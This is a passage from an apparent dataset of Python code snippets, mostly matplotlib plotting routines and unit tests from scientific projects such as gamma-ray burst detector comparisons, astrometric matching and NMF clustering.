np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n\tprint \"Total sim_flat_bin : \",sim_flat_bin.sum() #-----------------------------------------\n\t#print \" Max(cumsum) : \",max(np.cumsum(sim_flat)) #-----------------------------------------\n\n # Defining model background and data\n model = sim_flat_bin #avg_flat_bin\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n err_model = sim_err_flat_bin\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\t# Plotting observed vs predicted counts------------------------------------------------------\n\n\tfig = plt.figure()\n\tplt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$={cs:0.1f}\".format(cs=chi_sq))\n\tplt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n\tplt.plot(np.arange(-1000,1000),np.arange(-1000,1000),'k',linewidth=0.5)\n\tplt.xlim(min(model_copy)-5,max(model_copy)+5)\n\tplt.ylim(min(data_copy)-5,max(data_copy)+5)\n\tplt.xlabel('Predicted Counts')\n\tplt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n\tpdf_file.savefig(fig)\n\n\t# Scaling the model using curve fit =============================================================== \n\t\n\tparam,pcov = curve_fit(fit_line_int,model_copy,data_copy)\n\tscaling = param[0]\n\tintercept = param[1]\n\t\n\t# Plotting the scaled plots ===================================================================\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\t#model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\t#err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated (scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f},offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\t\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model(scaling = {s:0.2f}, offset={o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n # Defining model background and data\n #model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n #err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated(scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f}, offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\n\t# Plotting observed vs predicted counts--------------------------------------------------------\n\n\tfig = plt.figure()\n plt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$ = {cs:0.1f}\".format(cs=chi_sq))\n plt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\t\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n #plt.plot(np.arange(-1000,1000),fit_line(np.arange(-1000,1000),scaling),'k',linewidth=0.5,label='m = {s:0.2f}'.format(s=scaling))\n\tplt.plot(np.arange(-1000,1000),fit_line_int(np.arange(-1000,1000),scaling,intercept),'k',linewidth=0.5,label='scaling = {s:0.2f}, offset = {i:0.2f}'.format(s=scaling,i=intercept))\n\tplt.plot(np.arange(min(model_copy)-5,max(model_copy)+5),np.ones(len(np.arange(min(model_copy)-5,max(model_copy)+5)))*intercept,'r-',label='intercept',linewidth=0.5)\n plt.xlim(min(model_copy)-5,max(model_copy)+5)\n plt.ylim(min(data_copy)-5,max(data_copy)+5)\n plt.xlabel('Predicted Counts')\n plt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n pdf_file.savefig(fig)\n\t\t\n\tprint \"===============================================================================================\"\n\t\n\treturn", "def plot(self):\n\t\tself.plotOfTF().plot()", "def _plot_robot(self):\n try:\n x = 200\n y = 200\n self.ax1.plot(x, y, marker='o', markersize=10, linestyle='None')\n except Exception as err:\n rospy.loginfo(err)", "def test_chart_parsers():", "def test_y(self):\n g = gca()\n lines = g.get_lines() \n self.assertEqual(lines[0].get_ydata().tolist(), [3, 3, 1, 1, 3])", "def test_default():\n fig, ax = plt.subplots()\n ax.plot([0, 1], [0, 2])\n slide = _get_empty_slide()\n text = ax.set_title(\"TITLE TEXT\")\n ax.set_xlabel(\"X_LABEL\")\n ax.set_ylabel(\"Y_LABEL\")\n shape = figpptx.send(fig, slide=slide)\n assert get_typename(shape) == \"Shape\"\n shapes = _get_shapes(slide, individual=True)\n assert {shape.Type for shape in shapes} == {constants.msoPicture, constants.msoTextBox}", "def test_plot_timeseries_multivariate(tmpdir, random):\n x = np.linspace(start=0, stop=10, num=20)\n ys = np.stack((np.sin(x), np.cos(x), np.tan(0.4 * x)))\n segments = get_test_segments(data=ys)\n output_path = Path(tmpdir) / 'temp_visualization_test_multivariate.png'\n\n plot_timeseries(x=x,\n y=ys.T,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def test_plot_trace(mock_plot, sampler, tmpdir, samples, filename):\n sampler.nested_samples = samples\n sampler.state = MagicMock()\n sampler.state.log_vols = [1, 2, 3, 4]\n sampler.output = os.getcwd()\n\n if filename is not None:\n sampler.output = tmpdir.mkdir(\"test_plot_trace\")\n filename = os.path.join(sampler.output, filename)\n\n fig = NestedSampler.plot_trace(sampler, filename=filename)\n\n if not len(samples):\n mock_plot.assert_not_called()\n assert fig is None\n else:\n mock_plot.assert_called_once_with(\n [2, 3, 4], samples, filename=filename\n )\n assert fig == \"fig\"", "def test_plot_picks(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n pickdb = PickDatabaseConnection(':memory:')\n for pick in uniq_picks:\n pickdb.update_pick(**pick)\n splt = SEGYPickPlotter(ax, self.segy, pickdb)\n # should add a single artist to the line dict. for each event\n splt.plot_picks()\n for event in self.pickdb.events:\n self.assertTrue(len(splt.ACTIVE_LINES[event]), 1)\n # should be able to add new picks and have them be accessible by the\n # SEGYPickPlotter\n new_event = '--tracer--'\n new_pick = copy.copy(uniq_picks[0])\n new_pick['event'] = new_event\n pickdb.update_pick(**new_pick)\n splt.plot_picks()\n self.assertTrue(new_event in splt.ACTIVE_LINES)", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def test_call(self):\r\n # A lot of the returned numbers are based on random permutations and\r\n # thus cannot be tested for exact values. We'll test what we can\r\n # exactly, and then test for \"sane\" values for the \"random\" values. The\r\n # matplotlib Figure object cannot be easily tested either, so we'll try\r\n # our best to make sure it appears sane.\r\n obs = self.mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [0.5757052546507142, 0.60590471266814283,\r\n 0.63610417068557146, 0.66630362870299997, 0.69650308672042849,\r\n 0.72670254473785723, 0.75690200275528574]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [12, 6, 8, 10, 12, 16, 8]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.73244729118260765, 0.31157641757444593,\r\n 0.17627427296718071, None, None, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [0.57, 0.58, 0.59, 0.6,\r\n 0.61, 0.62, 0.63, 0.64, 0.65])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.1, 0.2, 0.3, 0.4, 0.5,\r\n 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 7)\r\n self.assertEqual(p_vals[3:], [None, None, None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[1] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[2] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals,\r\n [p_val * 3 if p_val is not None else None for p_val in p_vals])\r\n\r\n if (p_vals[0] >= 0 and p_vals[0] <= 0.01 and p_vals[1] > 0.01 and\r\n p_vals[1] <= 0.1 and p_vals[2] > 0.1 and p_vals[2] <= 0.5):\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def plot(self):\n\t\tself.plotOfSpect()", "def test_arguments_6(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2, tn1, tn2, tn0)", "def test_plot_save_figure(self):\n pname = os.path.join(\n self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03' + HEN_FILE_EXTENSION)\n hen.plot.main([pname, '--noplot', '--figname',\n os.path.join(self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03.png'),\n '-o', 'dummy.qdp'])", "def test_Figure():\n fig = plt.Figure()\n ax = fig.add_subplot(111)\n ax.add_patch(plt.Circle((0, 0), 1))\n ax.add_patch(plt.Rectangle((0, 0), 1, 2))\n\n _assert_output_equal(\n fake_renderer_output(fig, FakeRenderer),\n \"\"\"\n opening figure\n opening axes\n draw path with 25 vertices\n draw path with 4 vertices\n closing axes\n closing figure\n \"\"\",\n )", "def test_plot_lm_list():\n y = [1, 2, 3, 4, 5]\n assert plot_lm(y=y, x=np.arange(len(y)), show=False)", "def plot(self):\n\t\tself.plotOfXray().plot()", "def update_plot():\n pass", "def test_plot_ay_imported():\n assert \"plot_ay\" in sys.modules", "def check_graph(t, RA_main, DEC_main, survey, width,\n gtype=\"all\", add_plotid=True, prefix=None,\n saveplot=True, plotfile=None, plotfile_prefix=None,\n title=None, suptitle=None):\n import math\n import time\n\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n import numpy as np\n from matplotlib.colors import LogNorm\n\n import stats\n import plotid\n\n now = time.localtime(time.time())\n datestamp = time.strftime(\"%Y%m%d\", now)\n function_name = inspect.stack()[0][3]\n\n lineno = str(inspect.stack()[0][2])\n print(mk_timestamp(), function_name, lineno + ':')\n print(function_name + '.saveplot:', saveplot)\n print(function_name + '.plotfile:', plotfile)\n print(function_name + '.prefix: ', plotfile_prefix)\n\n ndata = len(t)\n\n n = 0\n xs = []\n ys = []\n while n < len(t):\n x = ((t[RA_main][n] - t[\"RA_\" + survey.upper()][n]) *\n math.cos((t[DEC_main][n] +\n t[\"DEC_\" + survey][n]) * math.pi / 360.0) * 3600.0)\n y = (t[DEC_main][n] - t[\"DEC_\" + survey.upper()][n]) * 3600.0\n\n if not np.isnan(x) and not np.isnan(y):\n xs.append(x)\n ys.append(y)\n n += 1\n\n n = 0\n xs_s = []\n ys_s = []\n if gtype == \"square\":\n w = width / math.sqrt(2.0)\n while n < len(xs):\n x = xs[n]\n y = ys[n]\n if x <= w and x >= -w and y <= w and y >= -w:\n xs_s.append(xs[n])\n ys_s.append(ys[n])\n n += 1\n\n xs = xs_s\n ys = ys_s\n\n xs1 = list(xs) + []\n ys1 = list(ys) + []\n\n RA_med = np.median(xs1)\n DEC_med = np.median(ys1)\n RA_MAD = stats.MAD(xs1, RA_med)\n DEC_MAD = stats.MAD(ys1, DEC_med)\n print(\"Number of points\", len(xs))\n print(\"RA offset\", RA_med, \"DEC offset\", DEC_med)\n print(\"RA MAD\", RA_MAD, \"DEC MAD\", DEC_MAD)\n print(\"RA Sigma MAD\", 1.486 * RA_MAD, \"DEC Sigma DEC\", 1.486 * DEC_MAD)\n print(\"RA Median Error\", 1.486 * RA_MAD / math.sqrt(len(xs)),\n \"DEC Median Error\", 1.486 * DEC_MAD / math.sqrt(len(ys)))\n print()\n if len(xs) == 0:\n print(\"No matches\")\n return RA_med, DEC_med\n\n gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1], height_ratios=[1, 2])\n fig = plt.figure()\n ax1 = plt.subplot(gs[0])\n ax1.hist(xs, bins=100, color=\"r\")\n ax1.set_xlim(-2.0, 2.0)\n ax1.axes.get_xaxis().set_visible(False)\n ax1.set_ylabel(\"Number\")\n\n ax2 = plt.subplot(gs[2])\n # ax2.plot(xs, ys, \"k+\")\n if len(xs) > 100:\n plt.hist2d(xs, ys, bins=100, cmap=\"binary\", norm=LogNorm())\n else:\n plt.plot(xs, ys, \"k.\", ms=2)\n ax2.set_ylim(-2.0, 2.0)\n ax2.set_xlim(-2.0, 2.0)\n ax2.set_xlabel('Delta RA /\"')\n ax2.set_ylabel('Delta Dec /\"')\n labels1 = ax2.get_xticks()\n ax2.set_xticklabels(labels1, rotation=270)\n\n if suptitle is None:\n fig.suptitle(\"Errors in matching: \" +\n survey + ': ' + str(ndata), fontsize='small')\n\n if suptitle is not None:\n fig.suptitle(suptitle + ': ' + str(ndata), fontsize='small')\n\n ax3 = plt.subplot(gs[3])\n ax3.hist(ys, bins=100, orientation=\"horizontal\", color=\"r\")\n ax3.set_ylim(-2.0, 2.0)\n ax3.set_xlabel(\"Number\")\n ax3.axes.get_yaxis().set_visible(False)\n labels2 = ax3.get_xticks()\n ax3.set_xticklabels(labels2, rotation=270)\n\n ax4 = plt.subplot(gs[1])\n ax4.annotate(\"Number of points: \" +\n str(len(xs)), xy=(0.01, 0.1), size=\"small\")\n ax4.annotate(\"RA offset: {0:.4f}\".format(RA_med) +\n '\"', xy=(0.01, 0.90), size=\"small\")\n ax4.annotate(\"DEC offset: {0:.4f}\".format(DEC_med) +\n '\"', xy=(0.01, 0.8), size=\"small\")\n ax4.annotate(\"RA MAD: {0:.4f}\".format(RA_MAD) +\n '\"', xy=(0.01, 0.7), size=\"small\")\n ax4.annotate(\"DEC MAD: {0:.4f}\".format(DEC_MAD) +\n '\"', xy=(0.01, 0.6), size=\"small\")\n ax4.annotate(\"RA median error: {0:.4f}\".\n format(1.486 * RA_MAD / math.sqrt(len(xs))) + '\"',\n xy=(0.01, 0.5), size=\"small\")\n ax4.annotate(\"DEC median error: {0:.4f}\".\n format(1.486 * DEC_MAD / math.sqrt(len(ys))) + '\"',\n xy=(0.01, 0.4), size=\"small\")\n ax4.annotate(\"RA sigma MAD: {0:.4f}\".format(RA_MAD * 1.486) +\n '\"', xy=(0.01, 0.3), size=\"small\")\n ax4.annotate(\"DEC sigma MAD: {0:.4f}\".format(DEC_MAD * 1.486) +\n '\"', xy=(0.01, 0.2), size=\"small\")\n\n ax4.axes.get_xaxis().set_visible(False)\n ax4.axes.get_yaxis().set_visible(False)\n\n if saveplot:\n lineno = str(inspect.stack()[0][2])\n print(mk_timestamp(), function_name, lineno)\n if add_plotid:\n plotid.plotid()\n if plotfile is None:\n plotfile = 'match'\n if plotfile_prefix is not None:\n plotfile = plotfile_prefix + '_match_' + datestamp + '.png'\n if plotfile_prefix is None:\n plotfile = 'match_' + datestamp + '.png'\n\n print('Saving: ', plotfile)\n plt.savefig(plotfile)\n\n plt.show()\n\n return RA_med, DEC_med", "def test_plot_timeseries_univariate(tmpdir, random):\n x = np.linspace(0, 10, 20)\n y = np.sin(x)\n segments = get_test_segments(data=np.expand_dims(y, 0))\n\n output_path = Path(tmpdir) / 'temp_visualization_test_univariate.png'\n\n plot_timeseries(x=x,\n y=y,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def test_plot(arg):\n source_data = data.Biofile(arg)\n sample = source_data.get_header()\n feature = source_data.get_index()\n sample_size, feature_size = 106, 12042\n sample = sample[:sample_size]\n #xshape = (106 12042)\n print(sample, feature)\n X = source_data.get_matrix().T[:sample_size, :feature_size]\n mx = 100\n labs = ['rbf','poly','sigmoid']\n semi_r = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, parameter = 100) #rbf 0.5\n semi_r_con = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, kernel='poly', parameter= 0.5)#ploy 2\n semi_r_con1 = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter=mx, kernel='sigmoid', parameter= 0.1) #sigmoid 0.5\n semi_r_con2 = util.convex_non_negative_factorization(X.T, max_iter=mx, n_components=2)\n\n #semi_r = util.semi_non_negative_factorization_with_straint(X.T, max_iter = mx,n_components=2 ,initialization= 'Kmeans',alpha = 0.01, beta = 0.01)\n #semi_r_con = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2 ,initialization= 'Kmeans',alpha= 10, beta = 10)\n #semi_r_con1 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 0, beta = 10)\n #semi_r_con2 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 10, beta = 0)\n #convex_r_con = util.convex_non_negative_factorization(X.T, n_components=2, max_iter=mx)\n\n G, G1, G2, G3 = semi_r[1], semi_r_con[1], semi_r_con1[1], semi_r_con2[1]\n result, result1, result2, result3 = semi_r[2], semi_r_con[2], semi_r_con1[2], semi_r_con2[2]\n x = [i for i in range(mx)]\n # plot the losses function\n plt.title(\"losses function of {}\".format(arg[:-4]))\n plt.xlabel(\"iteration times\")\n plt.ylabel(\"losses\")\n\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'kNMF({})'.format(labs[0]))\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'kNMF({})'.format(labs[1]))\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'kNMF({})'.format(labs[2]))\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'cvxnmf')\n \"\"\"\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'sNMF')\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'sNMF(0.5,0.5)')\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'sNMF(0,0.5)')\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'sNMF(0.5,1)')\n plt.plot(x, result4[:mx], 'k', marker = '.', label = 'cvx-NMF')\n \"\"\"\n plt.legend(bbox_to_anchor=[1,1])\n plt.grid()\n plt.show()\n\n #plot the clustering result\n plt1 = plt\n plt1.subplot(221)\n plt1.plot(G[:,0], G[:,1], 'ro')\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[0]))\n #items = zip(sample, G)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(222)\n plt1.plot(G1[:,0], G1[:,1], 'bo')\n\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[1]))\n\n #items = zip(sample, G1)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(223)\n plt1.plot(G2[:,0], G2[:,1], 'co')\n plt1.title(u'the distribution of items((knmf({}))'.format(labs[2]))\n #items = zip(sample, G4)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(224)\n plt1.plot(G3[:,0], G3[:,1], 'mo')\n plt1.title(u'the distribution of items(convex-nmf))')\n #items = zip(sample, G2)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.show()", "def test_init_SEGYPickPlotter(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPickPlotter(ax, self.segy, pickdb=self.pickdb)\n # should inherit from SEGYPlotter\n for member in inspect.getmembers(SEGYPlotter):\n self.assertTrue(hasattr(splt, member[0]))\n # should build header lookup table\n self.assertTrue(isinstance(splt.sdb, SEGYHeaderDatabase))\n # should attach axes\n self.assertTrue(isinstance(splt.ax, matplotlib.axes.Axes))", "def test_plot_ts(kwargs):\n nchains = 4\n ndraws = 500\n obs_data = {\n \"y\": 2 * np.arange(1, 9) + 3,\n \"z\": 2 * np.arange(8, 12) + 3,\n }\n\n posterior_predictive = {\n \"y\": np.random.normal(\n (obs_data[\"y\"] * 1.2) - 3, size=(nchains, ndraws, len(obs_data[\"y\"]))\n ),\n \"z\": np.random.normal(\n (obs_data[\"z\"] * 1.2) - 3, size=(nchains, ndraws, len(obs_data[\"z\"]))\n ),\n }\n\n const_data = {\"x\": np.arange(1, 9), \"x_pred\": np.arange(8, 12)}\n\n idata = from_dict(\n observed_data=obs_data,\n posterior_predictive=posterior_predictive,\n constant_data=const_data,\n coords={\"obs_dim\": np.arange(1, 9), \"pred_dim\": np.arange(8, 12)},\n dims={\"y\": [\"obs_dim\"], \"z\": [\"pred_dim\"]},\n )\n\n ax = plot_ts(idata=idata, y=\"y\", show=True, **kwargs)\n assert np.all(ax)", "def test_signals(self):\n G = graphs.Sensor()\n G.plot()\n def test_color(param, length):\n for value in ['r', 4*(.5,), length*(2,), np.ones([1, length]),\n np.random.RandomState(42).uniform(size=length),\n np.ones([length, 3]), [\"red\"] * length,\n np.random.RandomState(42).rand(length, 4)]:\n params = {param: value}\n G.plot(**params)\n for value in [10, (0.5, 0.5), np.ones([length, 2]),\n np.ones([2, length, 3]),\n np.ones([length, 3]) * 1.1]:\n params = {param: value}\n self.assertRaises(ValueError, G.plot, **params)\n for value in ['r', 4*(.5)]:\n params = {param: value, 'backend': 'pyqtgraph'}\n self.assertRaises(ValueError, G.plot, **params)\n test_color('vertex_color', G.n_vertices)\n test_color('edge_color', G.n_edges)\n def test_size(param, length):\n for value in [15, length*(2,), np.ones([1, length]),\n np.random.RandomState(42).uniform(size=length)]:\n params = {param: value}\n G.plot(**params)\n for value in [(2, 3, 4, 5), np.ones([2, length]),\n np.ones([2, length, 3])]:\n params = {param: value}\n self.assertRaises(ValueError, G.plot, **params)\n test_size('vertex_size', G.n_vertices)\n test_size('edge_width', G.n_edges)", "def test_plot_log(self):\n pname = os.path.join(\n self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03' + HEN_FILE_EXTENSION)\n cname = os.path.join(\n 